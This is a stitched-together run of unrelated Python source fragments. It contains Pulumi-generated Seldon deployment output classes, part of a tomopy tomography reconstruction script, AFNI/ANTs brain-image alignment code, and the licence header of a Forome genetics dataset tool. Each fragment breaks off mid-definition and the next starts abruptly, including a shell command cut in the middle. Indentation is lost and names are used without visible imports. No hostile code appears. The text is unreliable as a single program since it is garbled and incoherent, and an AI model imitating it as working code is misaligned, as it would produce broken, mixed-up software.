if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildren(dict):
def __init__(__self__, *,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
name: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphChildrenLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
if children is not None:
pulumi.set(__self__, "children", children)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildrenChildren(dict):
def __init__(__self__, *,
children: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren']] = None,
endpoint: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenEndpoint'] = None,
env_secret_ref_name: Optional[str] = None,
implementation: Optional[str] = None,
logger: Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenLogger'] = None,
methods: Optional[Sequence[str]] = None,
model_uri: Optional[str] = None,
name: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphChildrenChildrenLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
if children is not None:
pulumi.set(__self__, "children", children)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren(dict):
def __init__(__self__, *,
from __future__ import print_function
import time
import h5py
import numpy as np
import numexpr as ne
import skimage.transform as st
import os
import sys
import scipy.ndimage.filters as snf
import concurrent.futures as cf
import warnings
import importlib
import xlrd # for importing excel spreadsheets
from ast import literal_eval # For converting string to tuple
import glob
try:
import tomopy
from tomopy.util import mproc
except ImportError:
print("warning: tomopy is not available")
try:
import dxchange
except ImportError:
print("warning: dxchange is not available")
try:
importlib.import_module('pyF3D')
import pyF3D
except ImportError:
print("Warning: pyF3D not available")
#run this from the command line:
#python tomopy832.py
#it requires a separate file, which contains at minimum a list of filenames
#on separate lines. Default name of this file is input832.txt, but you can use any
#filename and run from the commandline as
#python tomopy832.py yourinputfile.txt
#If desired, on each line (separated by spaces) you can
#include parameters to override the defaults.
#to do this you need pairs, first the name of the variable, then the desired value
#For True/False, use 1/0.
#You can generate these input files in excel, in which case use tab-separated
#(or space separated). Some input overrides require multiple values,
#these should be comma-separated (with no spaces). Example is sinoused
#which would be e.g. 500,510,1 to get slices 500 through 509. For sinoused,
#you can use first value -1 and second value number of slices to get that number
#of slices from the middle of the stack.
#an example of the contents of the input file looks like this:
#20150820_162025_Mvesparium_20948-131_pieceA_10x_x00y00.h5 cor 1196 sinoused "-1,10,1" doPhaseRetrieval 0 outputFilename c1196.0
#20150820_162025_Mvesparium_20948-131_pieceA_10x_x00y00.h5 cor 1196.5 sinoused "-1,10,1" doPhaseRetrieval 0 outputFilename c1196.5
#this was generated in excel and saved as txt tab separated, so the quotes were
#added automatically by excel. Note also that for parameters expecting strings as
#input (outputFilename for example), the program will choke if you put in a number.
#if cor is not defined in the parameters file, automated cor detection will happen
#chunk_proj and chunk_sino handle memory management. If you are running out of memory, make one or both of those smaller.
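#The sketch below is illustrative only (an assumption, not this script's actual
#parser): it shows how one line of the input file described above could be split
#into a filename plus keyword overrides for recon(). Quoted multi-value settings
#such as sinoused "-1,10,1" become tuples; numbers and 1/0 flags are parsed with
#literal_eval, and anything else is kept as a string (e.g. outputFilename).
def _example_parse_input_line(line):
    import shlex
    tokens = shlex.split(line)  # honors the quotes excel adds around "-1,10,1"
    filename, overrides = tokens[0], {}
    for key, value in zip(tokens[1::2], tokens[2::2]):
        if ',' in value:
            overrides[key] = tuple(literal_eval(v) for v in value.split(','))
        else:
            try:
                overrides[key] = literal_eval(value)  # numbers and 1/0 flags
            except (ValueError, SyntaxError):
                overrides[key] = value  # plain strings like outputFilename
    return filename, overrides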
slice_dir = {
'remove_outlier1d': 'sino',
'remove_outlier2d': 'proj',
'normalize_nf': 'sino',
'normalize': 'both',
'minus_log': 'both',
'beam_hardening': 'both',
'remove_stripe_fw': 'sino',
'remove_stripe_ti': 'sino',
'remove_stripe_sf': 'sino',
'do_360_to_180': 'sino',
'correcttilt': 'proj',
'phase_retrieval': 'proj',
'recon_mask': 'sino',
'polar_ring': 'sino',
'bilateral_filter': 'both',
'castTo8bit': 'both',
'write_output': 'both'
}
#to profile memory, uncomment the following line
#and then run program from command line as
#python -m memory_profiler tomopy832.py
#(you have to have memory_profiler installed)
#@profile
def recon(
filename,
inputPath = './',
outputPath = None,
outputFilename = None,
doOutliers1D = False, # outlier removal in 1d (along sinogram columns)
outlier_diff1D = 750, # difference between good data and outlier data (outlier removal)
outlier_size1D = 3, # radius around each pixel to look for outliers (outlier removal)
doOutliers2D = False, # outlier removal, standard 2d on each projection
outlier_diff2D = 750, # difference between good data and outlier data (outlier removal)
outlier_size2D = 3, # radius around each pixel to look for outliers (outlier removal)
doFWringremoval = True, # Fourier-wavelet ring removal
doTIringremoval = False, # Titarenko ring removal
doSFringremoval = False, # Smoothing filter ring removal
ringSigma = 3, # damping parameter in Fourier space (Fourier-wavelet ring removal)
ringLevel = 8, # number of wavelet transform levels (Fourier-wavelet ring removal)
ringWavelet = 'db5', # type of wavelet filter (Fourier-wavelet ring removal)
ringNBlock = 0, # used in Titarenko ring removal (doTIringremoval)
ringAlpha = 1.5, # used in Titarenko ring removal (doTIringremoval)
ringSize = 5, # used in smoothing filter ring removal (doSFringremoval)
doPhaseRetrieval = False, # phase retrieval
alphaReg = 0.0002, # smaller = smoother (used for phase retrieval)
propagation_dist = 75, # sample-to-scintillator distance (phase retrieval)
kev = 24, # energy level (phase retrieval)
butterworth_cutoff = 0.25, #0.1 would be very smooth, 0.4 would be very grainy (reconstruction)
butterworth_order = 2, # for reconstruction
doTranslationCorrection = False, # correct for linear drift during scan
    xshift = 0, # undesired dx translation correction (from 0 degree to 180 degree proj)
    yshift = 0, # undesired dy translation correction (from 0 degree to 180 degree proj)
doPolarRing = False, # ring removal
Rarc=30, # min angle needed to be considered ring artifact (ring removal)
Rmaxwidth=100, # max width of rings to be filtered (ring removal)
Rtmax=3000.0, # max portion of image to filter (ring removal)
Rthr=3000.0, # max value of offset due to ring artifact (ring removal)
Rtmin=-3000.0, # min value of image to filter (ring removal)
cor=None, # center of rotation (float). If not used then cor will be detected automatically
corFunction = 'pc', # center of rotation function to use - can be 'pc', 'vo', or 'nm'
voInd = None, # index of slice to use for cor search (vo)
voSMin = -40, # min radius for searching in sinogram (vo)
voSMax = 40, # max radius for searching in sinogram (vo)
voSRad = 10, # search radius (vo)
voStep = 0.5, # search step (vo)
voRatio = 2.0, # ratio of field-of-view and object size (vo)
voDrop = 20, # drop lines around vertical center of mask (vo)
nmInd = None, # index of slice to use for cor search (nm)
nmInit = None, # initial guess for center (nm)
nmTol = 0.5, # desired sub-pixel accuracy (nm)
nmMask = True, # if True, limits analysis to circular region (nm)
nmRatio = 1.0, # ratio of radius of circular mask to edge of reconstructed image (nm)
nmSinoOrder = False, # if True, analyzes in sinogram space. If False, analyzes in radiograph space
use360to180 = False, # use 360 to 180 conversion
doBilateralFilter = False, # if True, uses bilateral filter on image just before write step # NOTE: image will be converted to 8bit if it is not already
bilateral_srad = 3, # spatial radius for bilateral filter (image will be converted to 8bit if not already)
bilateral_rrad = 30, # range radius for bilateral filter (image will be converted to 8bit if not already)
castTo8bit = False, # convert data to 8bit before writing
cast8bit_min=-10, # min value if converting to 8bit
cast8bit_max=30, # max value if converting to 8bit
useNormalize_nf = False, # normalize based on background intensity (nf)
chunk_proj = 100, # chunk size in projection direction
chunk_sino = 100, # chunk size in sinogram direction
npad = None, # amount to pad data before reconstruction
projused = None, #should be slicing in projection dimension (start,end,step)
sinoused = None, #should be sliceing in sinogram dimension (start,end,step). If first value is negative, it takes the number of slices from the second value in the middle of the stack.
correcttilt = 0, #tilt dataset
tiltcenter_slice = None, # tilt center (x direction)
tiltcenter_det = None, # tilt center (y direction)
angle_offset = 0, #this is the angle offset from our default (270) so that tomopy yields output in the same orientation as previous software (Octopus)
anglelist = None, #if not set, will assume evenly spaced angles which will be calculated by the angular range and number of angles found in the file. if set to -1, will read individual angles from each image. alternatively, a list of angles can be passed.
doBeamHardening = False, #turn on beam hardening correction, based on "Correction for beam hardening in computed tomography", <NAME>, 1979 Phys. Med. Biol. 24 81
BeamHardeningCoefficients = None, #6 values, tomo = a0 + a1*tomo + a2*tomo^2 + a3*tomo^3 + a4*tomo^4 + a5*tomo^5
    projIgnoreList = None, #projections to be ignored in the reconstruction (for simplicity in the code, they will not be removed and will be processed as all other projections but will be set to zero absorption right before reconstruction)
*args, **kwargs):
start_time = time.time()
print("Start {} at:".format(filename)+time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.localtime()))
outputPath = inputPath if outputPath is None else outputPath
outputFilename = filename if outputFilename is None else outputFilename
outputFilename = outputFilename.replace('.h5','')
tempfilenames = [outputPath+'tmp0.h5',outputPath+'tmp1.h5']
    filenametowrite = outputPath+'/rec'+filename.replace('.h5','')+'/'+outputFilename
#filenametowrite = outputPath+'/rec'+filename+'/'+outputFilename
print("cleaning up previous temp files", end="")
for tmpfile in tempfilenames:
try:
os.remove(tmpfile)
except OSError:
pass
print(", reading metadata")
datafile = h5py.File(inputPath+filename, 'r')
gdata = dict(dxchange.reader._find_dataset_group(datafile).attrs)
    pxsize = float(gdata['pxsize'])/10 # /10 to convert units from mm to cm
--float 1 \
-r {sanitized_base} -i {in_file} -d {dim} --input-image-type {image_type} \
-o {outputs['out_file']} --interpolation {interp} \
{' '.join(xform_cmds)}")
if is_bucket:
io.change_dim_order(in_file, dim_order='bucket', method='afni') # Change in_file back to bucket
io.change_dim_order(outputs['out_file'], dim_order='bucket', method='afni') # The output should follow input
if is_temp:
os.remove(sanitized_base)
# Make sure out_file is of the same space as base_file
    io.change_space(outputs['out_file'], space=io.get_space(base_file), method='nibabel') # Caution: Cannot use "afni" here...
# Copy afni subbrick labels
# This must go last because io.change_space(method='nibabel') will recreate the volume without afni metadata
try:
afni.set_brick_labels(outputs['out_file'], afni.get_brick_labels(in_file))
    except Exception: # TODO: In case the file doesn't have labels
pass
all_finished(outputs)
return outputs
def ants2afni_affine(ants_affine, afni_affine):
raise NotImplementedError
def afni2ants_affine(afni_affine, ants_affine):
raise NotImplementedError
def ants2afni_warp(ants_warp, afni_warp):
raise NotImplementedError
def afni2ants_warp(afni_warp, ants_warp):
raise NotImplementedError
class Transform(object):
def __init__(self, transforms, base_file=None, source_file=None):
'''
Parameters
----------
transforms : list of (fwd_xform, inv_xform) pairs
If only one transform (rather than a tuple) is given, it is assumed to be
the fwd_xform, and "fwd_xform -I" is treated as inv_xform.
Transform chain should be specified using "pulling" convention, i.e.,
last transform applies first (as in AFNI and ANTs for volumes).
Each transform should also be a "pulling" transform from moving to fixed
as generated by AFNI and ANTs.
Transforms should be specified by their file names, and inverse transforms
can be specified as "*_0GenericAffine.mat -I" (esp. for affine).
'''
# Add inverse transform automatically for singleton (assumed linear)
self.transforms = [(t, f"{t} -I") if isinstance(t, str) else tuple(t) for t in transforms]
self.base_file = base_file
self.source_file = source_file
def inverse(self):
transforms = [transform[::-1] for transform in self.transforms[::-1]]
return self.__class__(transforms, base_file=self.source_file, source_file=self.base_file)
def rebase(self, base_file):
return self.__class__(self.transforms, base_file=base_file, source_file=self.source_file)
def replace_path(self, p):
f = lambda fname: path.join(p, path.basename(fname))
self.transforms = [(f(fwd), f(inv)) for fwd, inv in self.transforms]
self.base_file = f(self.base_file)
self.source_file = f(self.source_file)
def to_json(self, fname):
with open(fname, 'w') as json_file:
json.dump(self.__dict__, json_file, indent=4)
@classmethod
def from_json(cls, fname, replace_path=False):
'''
Parameters
----------
replace_path: bool
Replace path of the transform files according to json file path
'''
with open(fname) as json_file:
data = json.load(json_file)
inst = cls(data['transforms'], base_file=data['base_file'], source_file=data['source_file'])
if replace_path:
inst.replace_path(path.dirname(fname))
return inst
def __repr__(self):
source = path.basename(self.source_file) if self.source_file is not None else 'unknown'
base = path.basename(self.base_file) if self.base_file is not None else 'unknown'
return f"<{self.__class__.__name__} | from {source} to {base} >"
def apply(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, forward transform (from input/moving to base/fixed)
'''
transforms = [xform_pair[0] for xform_pair in self.transforms]
base_file = self.base_file if base_file is None else base_file
return apply_transforms(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_inverse(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, inverse transform (from base/fixed to input/moving)
'''
transforms = [xform_pair[1] for xform_pair in self.transforms[::-1]] # Inverse
base_file = self.source_file if base_file is None else base_file
return apply_transforms(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
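def _example_transform_usage():
    # Illustrative sketch only: the file names below are hypothetical, and a real
    # transform chain would typically come from ANTsTransform.from_align_ants().
    xform = Transform(
        [('anat2tmpl_1Warp.nii.gz', 'anat2tmpl_1InverseWarp.nii.gz'),
         'anat2tmpl_0GenericAffine.mat'],  # singleton: inverse is assumed as "... -I"
        base_file='template.nii.gz', source_file='anat.nii.gz')
    xform.apply('anat.nii.gz', 'anat_in_template.nii.gz')  # moving -> fixed
    xform.inverse().apply('atlas.nii.gz', 'atlas_in_anat.nii.gz')  # fixed -> moving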
class ANTsTransform(Transform):
@classmethod
def from_align_ants(cls, outputs):
transforms = [(path.realpath(outputs['fwd_warp']), path.realpath(outputs['inv_warp'])),
(path.realpath(outputs['fwd_affine']), path.realpath(outputs['fwd_affine'])+' -I')]
return cls(transforms, base_file=path.realpath(outputs['base_file']), source_file=path.realpath(outputs['in_file']))
def apply(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, forward transform (from input/moving to base/fixed)
'''
transforms = [xform_pair[0] for xform_pair in self.transforms]
base_file = self.base_file if base_file is None else base_file
return apply_ants(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_inverse(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, inverse transform (from base/fixed to input/moving)
'''
transforms = [xform_pair[1] for xform_pair in self.transforms[::-1]] # Inverse
base_file = self.source_file if base_file is None else base_file
return apply_ants(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_to_points(self, in_file, out_file):
'''
For list of points, forward transform (from input/moving to base/fixed)
Parameters
----------
in_file, out_file : `*.csv` file with "x,y,z,t" header line.
'''
return self.apply_inverse(in_file, out_file, base_file=None)
def apply_inverse_to_points(self, in_file, out_file):
'''
For list of points, inverse transform (from base/fixed to input/moving)
Parameters
----------
in_file, out_file : `*.csv` file with "x,y,z,t" header line.
'''
return self.apply(in_file, out_file, base_file=None)
def _apply_transform_to_xyz(self, xyz, convention='DICOM', transform='forward'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
transform : 'forward' | 'inverse'
'''
temp_file = utils.temp_prefix(suffix='.csv')
if convention.upper() in ['NIFTI', 'LPI', 'RAS+']:
xyz = xyz * [-1, -1, 1] # To DICOM or RAI or LPS+
np.savetxt(temp_file, np.c_[xyz, np.zeros(xyz.shape[0])], delimiter=',', header='x,y,z,t', comments='')
if transform == 'forward':
self.apply_to_points(temp_file, temp_file)
elif transform == 'inverse':
self.apply_inverse_to_points(temp_file, temp_file)
xyz = np.loadtxt(temp_file, skiprows=1, delimiter=',')[:,:3]
if convention.upper() in ['NIFTI', 'LPI', 'RAS+']:
xyz = xyz * [-1, -1, 1] # Back to NIFTI
os.remove(temp_file)
return xyz
def apply_to_xyz(self, xyz, convention='DICOM'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
'''
return self._apply_transform_to_xyz(xyz, convention=convention, transform='forward')
def apply_inverse_to_xyz(self, xyz, convention='DICOM'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
'''
return self._apply_transform_to_xyz(xyz, convention=convention, transform='inverse')
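def _example_xyz_conventions(xform):
    # Illustrative sketch (hypothetical coordinates): map an Nx3 array of points
    # given in the NIFTI (RAS+) convention from moving to fixed space. As
    # implemented above, points are flipped to DICOM (LPS+) before calling ANTs
    # and flipped back afterwards, so callers can stay in one convention.
    xyz_ras = np.array([[36.0, -52.0, 48.0]])
    return xform.apply_to_xyz(xyz_ras, convention='NIFTI')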
def align_anat(base_file, in_file, out_file, strip=None, N4=None, init_shift=None, init_rotate=None, init_xform=None,
method=None, cost=None, n_params=None, interp=None, max_rotate=None, max_shift=None,
emask=None, save_weight=None):
'''
emask : fname
Mask to exclude from analysis.
'''
def parse_cost(output):
pattern = re.compile(r'\+\+ allcost output: final fine #0')
k = 0
while k < len(output):
match = pattern.match(output[k])
k += 1
if match:
cost = {}
while True:
                    match = re.search(r'(\S+)\s+= (\S+)', output[k])
k += 1
if match:
cost[match.group(1)] = float(match.group(2))
else:
break
return cost
if method is None:
method = '3dallineate'
else:
method = method.lower()
assert(method in ['3dallineate', 'align_epi_anat'])
if cost is None:
cost = 'lpa'
elif cost == 'within':
cost = 'lpa'
elif cost == 'cross':
cost = 'lpc'
elif cost == 'edge':
cost = 'lpa -edge'
if method != 'align_epi_anat':
raise ValueError('cost="edge" only works with method="align_epi_anat"')
if n_params is None:
n_params = 'affine_general'
elif n_params in ['affine', 12]:
n_params = 'affine_general'
elif n_params in ['rigid', 6]:
n_params = 'shift_rotate'
if interp is None:
interp = 'wsinc5'
init_shift_cmd = ''
if init_shift is None:
if init_rotate is None and max_shift is None:
init_shift_cmd = '-cmass'
if max_rotate is None:
max_rotate = 90
temp_dir = utils.temp_folder()
prefix, ext = afni.split_out_file(out_file)
outputs = {
'out_file': f"{prefix}{ext}",
'xform_file': f"{prefix}.aff12.1D",
'cost': None,
}
if save_weight is not None:
outputs['weight_file'] = save_weight if isinstance(save_weight, six.string_types) else f"{prefix}.autoweight{ext}"
pc = utils.PooledCaller()
# Strip skull
if strip is None:
strip = True
if isinstance(strip, (str, bool)):
strip = [strip]
if not set(strip).isdisjoint({True, 'both', 'base', 'template'}):
pc.run(skullstrip, base_file, f"{temp_dir}/base_ns.nii")
else:
pc.run(f"3dcopy {base_file} {temp_dir}/base_ns.nii")
if not set(strip).isdisjoint({True, 'both', 'source', 'src', 'input', 'in'}):
pc.run(skullstrip, in_file, f"{temp_dir}/in_ns.nii")
else:
pc.run(f"3dcopy {in_file} {temp_dir}/in_ns.nii")
pc.wait()
# Correct bias field using N4 method in ANTs
# This may potentially enhance the performance of some cost functions.
# Consider trying 6 dof rigid body transform instead of 12 dof affine.
if N4 is None:
N4 = False
if N4 and shutil.which('N4BiasFieldCorrection') is None:
raise ValueError('>> ANTs is not (correctly) installed. So cannot use N4BiasFieldCorrection. Set N4=None.')
if isinstance(N4, (str, bool)):
N4 = [N4]
if not set(N4).isdisjoint({True, 'both', 'base', 'template'}):
pc.run(f"N4BiasFieldCorrection -d 3 -i {temp_dir}/base_ns.nii -s 2 -o \
'[{temp_dir}/base_ns.nii,{temp_dir}/base_bias.nii]'")
    if not set(N4).isdisjoint({True, 'both', 'source', 'src', 'input', 'in'}):
pc.run(f"N4BiasFieldCorrection -d 3 -i {temp_dir}/in_ns.nii -s 2 -o \
'[{temp_dir}/in_ns.nii,{temp_dir}/in_bias.nii]'")
pc.wait()
# Apply initial (manual) alignment and extract the parameters
transforms = []
if init_rotate is not None:
if init_rotate:
init_mat = nudge_cmd2mat(init_rotate, f"{temp_dir}/in_ns.nii")
init_xform = f"{temp_dir}/init.aff12.1D"
io.write_affine(init_xform, init_mat)
if init_xform is not None:
apply_transforms(init_xform, f"{temp_dir}/base_ns.nii",
f"{temp_dir}/in_ns.nii", f"{temp_dir}/in_ns.nii")
transforms.insert(0, init_xform)
# Estimate best alignment parameters
if method == '3dallineate':
res = utils.run(f'''3dAllineate -final {interp} -cost {cost} -allcost -warp {n_params} \
{init_shift_cmd} \
-maxrot {max_rotate} {'' if max_shift is None else f'-maxshf {max_shift}'} \
-base {temp_dir}/base_ns.nii -input {temp_dir}/in_ns.nii \
-autoweight -source_automask+2 -twobest 11 -fineblur 1 \
{f'-emask {emask}' if emask is not None else ''} \
{f'-wtprefix {outputs["weight_file"]}' if save_weight is not None else ''} \
-1Dmatrix_save {temp_dir}/in2base.aff12.1D \
-prefix {temp_dir}/out_ns.nii -overwrite''')
transforms.insert(0, f"{temp_dir}/in2base.aff12.1D")
outputs['cost'] = parse_cost(res['output'])
    elif method == 'align_epi_anat':
        raise NotImplementedError('method="align_epi_anat" is not implemented yet')
# Apply all transforms at once
apply_transforms(transforms, base_file, in_file, outputs['out_file'], interp=interp, save_xform=outputs['xform_file'])
shutil.rmtree(temp_dir)
all_finished(outputs)
return outputs
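# Minimal usage sketch for align_anat(); the file names and option choices are
# hypothetical and only illustrate the keyword interface defined above:
#     outputs = align_anat('T1_template.nii', 'T1_subject.nii', 'T1_aligned.nii',
#                          strip='both', N4=True, n_params='rigid', cost='within')
#     print(outputs['xform_file'], outputs['cost'])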
def align_S2E(base_file, suma_dir, out_file=None, **kwargs):
surf_vol = afni.get_surf_vol(suma_dir)
if out_file is None:
out_dir, prefix, ext = afni.split_out_file(base_file, split_path=True, trailing_slash=True)
out_file = f"{out_dir}SurfVol_Alnd_Exp{ext}"
out_dir, prefix, ext = afni.split_out_file(out_file, split_path=True, trailing_slash=True)
outputs = align_anat(base_file, surf_vol, out_file, **kwargs)
outputs['script_file'] = f"{out_dir}run_suma"
    spec_file
# Copyright (c) 2019. Partners HealthCare and other members of
# Forome Association
#
# Developed by <NAME> based on contributions by <NAME>,
# <NAME>, <NAME> and other members of Division of
# Genetics, Brigham and Women's Hospital
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys, codecs, json, os, shutil, re, time, logging
from argparse import ArgumentParser
from datetime import datetime
from forome_tools.json_conf import loadJSonConfig, loadCommentedJSon
from forome_tools.inventory import loadDatasetInventory
from app.prepare.druid_adm import DruidAdmin
from app.prepare.html_report import reportDS
from app.prepare.doc_works import prepareDocDir
from app.prepare.ds_create import (createDS,
portionFavorDruidPush, pushDruidDataset)
from app.config.solutions import readySolutions
from app.model.mongo_db import MongoConnector
from app.model.dir_entry import DirDSEntry
from app.model.ds_favor import FavorStorageAgent
#===============================================
sID_Pattern = re.compile(r'^\S+$', re.U)
def checkDSName(name, kind):
    if not sID_Pattern.match(name) or not name[0].isalpha():
print("Incorrect dataset name:", name, file = sys.stderr)
assert False
if kind == "ws":
